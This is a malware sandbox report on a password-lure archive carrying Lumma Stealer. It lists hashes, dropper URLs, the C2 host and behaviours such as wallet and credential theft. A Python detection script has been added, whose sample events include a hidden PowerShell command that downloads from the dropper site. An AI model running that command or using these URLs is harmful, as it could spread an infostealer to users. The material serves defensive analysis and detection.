Resubmissions

13-11-2024 20:41

241113-zgjjzayjay 10

13-11-2024 20:38

241113-ze8fbaskej 7

General

  • Target

    #Set-Uρ__9571--P𝐚SS̤̊w0rD̼S!!# (9571).zip

  • Size

    5.7MB

  • Sample

    241113-zgjjzayjay

  • MD5

    ed1ba2d2ef2defc75f970cd53224d9f6

  • SHA1

    062438459a1989bcfffa3779cf6451aaf107743e

  • SHA256

    e3f091c26b500cc71b761c4608a7d466cacf75d0a9d982c2fefa539bb2b96362

  • SHA512

    765c5285e89771c91e31612dbe8102b15b7af5bee18198b92bb1b6c58d968de7c6204107fa819dd098e6b2fc2d86f9e1bf811ae12226311c0af5e23d6481eca1

  • SSDEEP

    98304:HH4e2PdHzJmI6Velw3O8IaGQaT9RPDaFUpfpYEM1tAzAAg2q1BDWfm41A6bvdOgH:4eudQI6VelmEqav7aF4M1uYye41A6rhH

Malware Config

Extracted

  • Language

    ps1

  • Source

  • URLs

    exe.dropper  https://mindfusteps.shop/minz/m4nd.zip
    exe.dropper  https://mindfusteps.shop/minz/m2nd.zip
    exe.dropper  https://mindfusteps.shop/minz/m3nd.zip
    exe.dropper  https://mindfusteps.shop/minz/m1nd.zip
    exe.dropper  https://mindfusteps.shop/mind/

Extracted

  • Family

    lumma

  • C2

    https://pixelstory.shop/api

Targets

    • Target

      !Set-𝙐p_9571--PaṨ𝚂𝚆0rᎠ𝒮S#.rar

    • Size

      5.7MB

    • MD5

      187384d2980886e47bc6b18868b5b843

    • SHA1

      fc8d27ebe873ddd351da0a23ff4a9dbfb3da1b60

    • SHA256

      b98af4a6a58a4a1baed6fa1e649ae3a54e686e4ab4d792d94eb0cce77bed25ff

    • SHA512

      cdf5640dea2e8a92508fdee3fffb3443aa4570756fd02e51d9335443851015f93635d4193971ca113d28e104ab227626d72b499a0cd1ad5d326c9e54548efae9

    • SSDEEP

      98304:1H4e2PdHzJmI6Velw3O8IaGQaT9RPDaFUpfpYEM1tAzAAg2q1BDWfm41A6bvdOgp:ieudQI6VelmEqav7aF4M1uYye41A6rhp

    • Lumma Stealer, LummaC

      Lumma, also tracked as LummaC, is an infostealer written in C++ and first seen in August 2022.

    • Lumma family

    • Blocklisted process makes network request

    • Downloads MZ/PE file

    • Executes dropped EXE

    • Loads dropped DLL

    • Uses the VBS compiler for execution

    • Accesses cryptocurrency files/wallets, possible credential harvesting

    • Adds Run key to start application

    • Suspicious use of SetThreadContext
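The behaviour list above maps directly onto host telemetry: a PowerShell stage pulling archives from mindfusteps.shop, vbc.exe (the VBS compiler) making a network request, a Run key being written, and traffic to the Lumma C2 at pixelstory.shop. The following is an added example, not part of the Triage report or of any vendor tooling, showing how a responder would turn those indicators into detection logic over Sysmon-style events. The event records, the SID in the registry path, the file paths and the vbc.exe blocklist are all constructed for the example; only the two hostnames come from the report.

```python
import ntpath
import re

# Indicators taken from the extracted config above (hosts only; the archive
# names m1nd.zip .. m4nd.zip are stage-specific and may rotate).
DROPPER_HOSTS = {"mindfusteps.shop"}
C2_HOSTS = {"pixelstory.shop"}

# "Uses the VBS compiler for execution" + "Blocklisted process makes network
# request": a compiler has no reason to open sockets, so any network event from
# it is a strong signal. Hypothetical blocklist; extend it to fit your estate.
BLOCKLISTED_NETWORK_PROCS = {"vbc.exe"}

URL_HOST_RE = re.compile(r"https?://([^/\s\"']+)", re.I)
# "Adds Run key to start application": any value written under ...\CurrentVersion\Run
RUN_KEY_RE = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", re.I)


def _image_name(event):
    # ntpath handles Windows paths regardless of the host OS running this script.
    return ntpath.basename(event.get("image", "")).lower()


def _hosts_in(text):
    # Pull hostnames out of any URL in a command line, dropping an explicit port.
    return {h.lower().split(":")[0] for h in URL_HOST_RE.findall(text)}


def detect(events):
    """Return a list of (rule_name, event_index) hits.

    Event dicts mimic Sysmon: id 1 = process create (image, cmdline),
    id 3 = network connect (image, dest_host), id 13 = registry value set (target).
    """
    hits = []
    for i, ev in enumerate(events):
        eid = ev.get("id")
        if eid == 1:
            if _hosts_in(ev.get("cmdline", "")) & DROPPER_HOSTS:
                hits.append(("dropper_url_in_cmdline", i))
        elif eid == 3:
            if ev.get("dest_host", "").lower() in C2_HOSTS:
                hits.append(("lumma_c2_connection", i))
            if _image_name(ev) in BLOCKLISTED_NETWORK_PROCS:
                hits.append(("blocklisted_process_network", i))
        elif eid == 13:
            if RUN_KEY_RE.search(ev.get("target", "")):
                hits.append(("run_key_persistence", i))
    return hits


# Constructed sample telemetry (not captured from the real sample).
SAMPLE_EVENTS = [
    {"id": 1,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -w hidden -c iwr https://mindfusteps.shop/minz/m1nd.zip "
                "-OutFile $env:TEMP\\m1nd.zip"},
    {"id": 3,
     "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe",
     "dest_host": "pixelstory.shop", "dest_port": 443},
    {"id": 13,
     "image": r"C:\Users\user\AppData\Local\Temp\setup.exe",
     "target": r"HKU\S-1-5-21-111-222-333-1001\Software\Microsoft\Windows\CurrentVersion\Run\Update",
     "details": r"C:\Users\user\AppData\Roaming\update.exe"},
    {"id": 3,  # benign browser traffic, must not alert
     "image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "dest_host": "example.org", "dest_port": 443},
]

if __name__ == "__main__":
    for rule, idx in detect(SAMPLE_EVENTS):
        print(f"{rule:32s} event[{idx}] {_image_name(SAMPLE_EVENTS[idx])}")
```

The vbc.exe event fires two rules at once (known C2 host and blocklisted process), which is the point of layering a behavioural rule on top of the IOC match: when the operators move the C2 to a new domain, the compiler-makes-network-request rule still fires.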

MITRE ATT&CK Enterprise v15

Tasks